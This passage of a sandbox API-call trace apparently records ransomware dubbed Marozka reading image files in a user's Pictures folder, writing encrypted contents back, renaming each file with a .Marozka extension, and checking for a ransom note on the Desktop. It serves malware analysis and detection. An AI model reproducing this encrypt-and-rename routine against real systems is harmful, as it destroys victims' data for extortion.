"c:\\users\\fd1hvy\\pictures\\ajutmio9ti.jpg.marozka")) returned 1 [0055.277] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\bAjYFn58uS.bmp", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\bAjYFn58uS.bmp", lpFilePart=0x0) returned 0x27 [0055.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0055.277] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\bAjYFn58uS.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\bajyfn58us.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.277] GetFileType (hFile=0x2e0) returned 0x1 [0055.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0055.277] GetFileType (hFile=0x2e0) returned 0x1 [0055.277] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xf133 [0055.277] ReadFile (in: hFile=0x2e0, lpBuffer=0x27298bc, nNumberOfBytesToRead=0xf133, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x27298bc*, lpNumberOfBytesRead=0x5beabc*=0xf133, lpOverlapped=0x0) returned 1 [0055.277] CloseHandle (hObject=0x2e0) returned 1 [0055.383] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0055.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0055.383] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0055.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0055.383] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\bAjYFn58uS.bmp", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\bAjYFn58uS.bmp", lpFilePart=0x0) returned 0x27 [0055.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0055.383] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\bAjYFn58uS.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\bajyfn58us.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.385] GetFileType (hFile=0x2e0) returned 0x1 [0055.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0055.385] GetFileType (hFile=0x2e0) returned 0x1 [0055.385] WriteFile (in: hFile=0x2e0, lpBuffer=0x27a3a7c*, nNumberOfBytesToWrite=0xf140, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x27a3a7c*, lpNumberOfBytesWritten=0x5beab0*=0xf140, lpOverlapped=0x0) returned 1 [0055.386] CloseHandle (hObject=0x2e0) returned 1 [0055.388] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\bAjYFn58uS.bmp", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\bAjYFn58uS.bmp", lpFilePart=0x0) returned 0x27 [0055.388] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\bAjYFn58uS.bmp.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\bAjYFn58uS.bmp.Marozka", lpFilePart=0x0) returned 0x2f [0055.388] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0055.388] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\bAjYFn58uS.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\bajyfn58us.bmp"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44fcc060, ftCreationTime.dwHighDateTime=0x1d4c962, ftLastAccessTime.dwLowDateTime=0x4f550b50, ftLastAccessTime.dwHighDateTime=0x1d4c758, ftLastWriteTime.dwLowDateTime=0xe3bd87e5, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xf140)) returned 1 [0055.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0055.388] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\bAjYFn58uS.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\bajyfn58us.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\bAjYFn58uS.bmp.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\bajyfn58us.bmp.marozka")) returned 1 [0055.389] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\C3Nt.jpg", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\C3Nt.jpg", lpFilePart=0x0) returned 0x21 [0055.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0055.389] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\C3Nt.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\c3nt.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.389] GetFileType (hFile=0x2e0) returned 0x1 [0055.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0055.389] GetFileType (hFile=0x2e0) returned 0x1 [0055.389] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x93aa [0055.389] ReadFile (in: hFile=0x2e0, lpBuffer=0x27b303c, nNumberOfBytesToRead=0x93aa, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x27b303c*, lpNumberOfBytesRead=0x5beabc*=0x93aa, lpOverlapped=0x0) returned 1 [0055.391] CloseHandle (hObject=0x2e0) returned 1 [0055.412] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0055.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0055.412] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0055.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0055.413] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\C3Nt.jpg", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\C3Nt.jpg", lpFilePart=0x0) returned 0x21 [0055.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0055.413] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\C3Nt.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\c3nt.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.414] GetFileType (hFile=0x2e0) returned 0x1 [0055.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0055.414] GetFileType (hFile=0x2e0) returned 0x1 [0055.414] WriteFile (in: hFile=0x2e0, lpBuffer=0x282e098*, nNumberOfBytesToWrite=0x93b0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x282e098*, lpNumberOfBytesWritten=0x5beab0*=0x93b0, lpOverlapped=0x0) returned 1 [0055.415] CloseHandle (hObject=0x2e0) returned 1 [0055.416] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\C3Nt.jpg", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\C3Nt.jpg", lpFilePart=0x0) returned 0x21 [0055.416] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\C3Nt.jpg.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\C3Nt.jpg.Marozka", lpFilePart=0x0) returned 0x29 [0055.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0055.416] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\C3Nt.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\c3nt.jpg"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d2a01a0, ftCreationTime.dwHighDateTime=0x1d4c5bc, ftLastAccessTime.dwLowDateTime=0x7e3be600, ftLastAccessTime.dwHighDateTime=0x1d4c884, ftLastWriteTime.dwLowDateTime=0xe3c24dd7, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x93b0)) returned 1 [0055.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0055.417] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\C3Nt.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\c3nt.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\C3Nt.jpg.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\c3nt.jpg.marozka")) returned 1 [0055.417] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\E6NZjKehRQ8HXS.bmp", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\E6NZjKehRQ8HXS.bmp", lpFilePart=0x0) returned 0x2b [0055.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0055.417] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\E6NZjKehRQ8HXS.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\e6nzjkehrq8hxs.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.417] GetFileType (hFile=0x2e0) returned 0x1 [0055.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0055.417] GetFileType (hFile=0x2e0) returned 0x1 [0055.417] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x3287 [0055.417] ReadFile (in: hFile=0x2e0, lpBuffer=0x28378cc, nNumberOfBytesToRead=0x3287, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x28378cc*, lpNumberOfBytesRead=0x5beabc*=0x3287, lpOverlapped=0x0) returned 1 [0055.418] CloseHandle (hObject=0x2e0) returned 1 [0055.434] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0055.434] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0055.434] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0055.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0055.434] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\E6NZjKehRQ8HXS.bmp", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\E6NZjKehRQ8HXS.bmp", lpFilePart=0x0) returned 0x2b [0055.434] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0055.434] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\E6NZjKehRQ8HXS.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\e6nzjkehrq8hxs.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.435] GetFileType (hFile=0x2e0) returned 0x1 [0055.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0055.435] GetFileType (hFile=0x2e0) returned 0x1 [0055.435] WriteFile (in: hFile=0x2e0, lpBuffer=0x26925b0*, nNumberOfBytesToWrite=0x3290, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x26925b0*, lpNumberOfBytesWritten=0x5beab0*=0x3290, lpOverlapped=0x0) returned 1 [0055.437] CloseHandle (hObject=0x2e0) returned 1 [0055.438] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\E6NZjKehRQ8HXS.bmp", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\E6NZjKehRQ8HXS.bmp", lpFilePart=0x0) returned 0x2b [0055.438] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\E6NZjKehRQ8HXS.bmp.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\E6NZjKehRQ8HXS.bmp.Marozka", lpFilePart=0x0) returned 0x33 [0055.438] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0055.438] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\E6NZjKehRQ8HXS.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\e6nzjkehrq8hxs.bmp"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc26414a0, ftCreationTime.dwHighDateTime=0x1d4d0af, ftLastAccessTime.dwLowDateTime=0x590c8c0, ftLastAccessTime.dwHighDateTime=0x1d4d2e7, ftLastWriteTime.dwLowDateTime=0xe3c71141, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x3290)) returned 1 [0055.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0055.438] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\E6NZjKehRQ8HXS.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\e6nzjkehrq8hxs.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\E6NZjKehRQ8HXS.bmp.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\e6nzjkehrq8hxs.bmp.marozka")) returned 1 [0055.439] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\gUw5Y6tGMK.bmp", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\gUw5Y6tGMK.bmp", lpFilePart=0x0) returned 0x27 [0055.439] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0055.439] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\gUw5Y6tGMK.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\guw5y6tgmk.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.439] GetFileType (hFile=0x2e0) returned 0x1 [0055.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0055.439] GetFileType (hFile=0x2e0) returned 0x1 [0055.439] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x8d3f [0055.439] ReadFile (in: hFile=0x2e0, lpBuffer=0x2695d48, nNumberOfBytesToRead=0x8d3f, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x2695d48*, lpNumberOfBytesRead=0x5beabc*=0x8d3f, lpOverlapped=0x0) returned 1 [0055.439] CloseHandle (hObject=0x2e0) returned 1 [0055.462] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0055.462] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0055.462] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0055.463] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0055.463] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\gUw5Y6tGMK.bmp", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\gUw5Y6tGMK.bmp", lpFilePart=0x0) returned 0x27 [0055.463] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0055.463] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\gUw5Y6tGMK.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\guw5y6tgmk.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.464] GetFileType (hFile=0x2e0) returned 0x1 [0055.464] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0055.464] GetFileType (hFile=0x2e0) returned 0x1 [0055.464] WriteFile (in: hFile=0x2e0, lpBuffer=0x270eed0*, nNumberOfBytesToWrite=0x8d40, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x270eed0*, lpNumberOfBytesWritten=0x5beab0*=0x8d40, lpOverlapped=0x0) returned 1 [0055.466] CloseHandle (hObject=0x2e0) returned 1 [0055.467] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\gUw5Y6tGMK.bmp", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\gUw5Y6tGMK.bmp", lpFilePart=0x0) returned 0x27 [0055.467] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\gUw5Y6tGMK.bmp.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\gUw5Y6tGMK.bmp.Marozka", lpFilePart=0x0) returned 0x2f [0055.467] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0055.467] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\gUw5Y6tGMK.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\guw5y6tgmk.bmp"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0619fa0, ftCreationTime.dwHighDateTime=0x1d4d51c, ftLastAccessTime.dwLowDateTime=0xeea45f60, ftLastAccessTime.dwHighDateTime=0x1d4c822, ftLastWriteTime.dwLowDateTime=0xe3c973f3, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x8d40)) returned 1 [0055.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0055.468] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\gUw5Y6tGMK.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\guw5y6tgmk.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\gUw5Y6tGMK.bmp.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\guw5y6tgmk.bmp.marozka")) returned 1 [0055.468] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\GYIWDLBS0sDwEVs3.png", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\GYIWDLBS0sDwEVs3.png", lpFilePart=0x0) returned 0x2d [0055.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0055.469] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\GYIWDLBS0sDwEVs3.png" (normalized: "c:\\users\\fd1hvy\\pictures\\gyiwdlbs0sdwevs3.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.469] GetFileType (hFile=0x2e0) returned 0x1 [0055.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0055.469] GetFileType (hFile=0x2e0) returned 0x1 [0055.469] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xb584 [0055.469] ReadFile (in: hFile=0x2e0, lpBuffer=0x27180c0, nNumberOfBytesToRead=0xb584, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x27180c0*, lpNumberOfBytesRead=0x5beabc*=0xb584, lpOverlapped=0x0) returned 1 [0055.469] CloseHandle (hObject=0x2e0) returned 1 [0055.491] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0055.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0055.491] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0055.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0055.491] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\GYIWDLBS0sDwEVs3.png", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\GYIWDLBS0sDwEVs3.png", lpFilePart=0x0) returned 0x2d [0055.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0055.491] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\GYIWDLBS0sDwEVs3.png" (normalized: "c:\\users\\fd1hvy\\pictures\\gyiwdlbs0sdwevs3.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.493] GetFileType (hFile=0x2e0) returned 0x1 [0055.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0055.493] GetFileType (hFile=0x2e0) returned 0x1 [0055.493] WriteFile (in: hFile=0x2e0, lpBuffer=0x2786f6c*, nNumberOfBytesToWrite=0xb590, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x2786f6c*, lpNumberOfBytesWritten=0x5beab0*=0xb590, lpOverlapped=0x0) returned 1 [0055.494] CloseHandle (hObject=0x2e0) returned 1 [0055.496] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\GYIWDLBS0sDwEVs3.png", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\GYIWDLBS0sDwEVs3.png", lpFilePart=0x0) returned 0x2d [0055.496] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\GYIWDLBS0sDwEVs3.png.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\GYIWDLBS0sDwEVs3.png.Marozka", lpFilePart=0x0) returned 0x35 [0055.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0055.496] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\GYIWDLBS0sDwEVs3.png" (normalized: "c:\\users\\fd1hvy\\pictures\\gyiwdlbs0sdwevs3.png"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b92f610, ftCreationTime.dwHighDateTime=0x1d4d3e2, ftLastAccessTime.dwLowDateTime=0x1c5910e0, 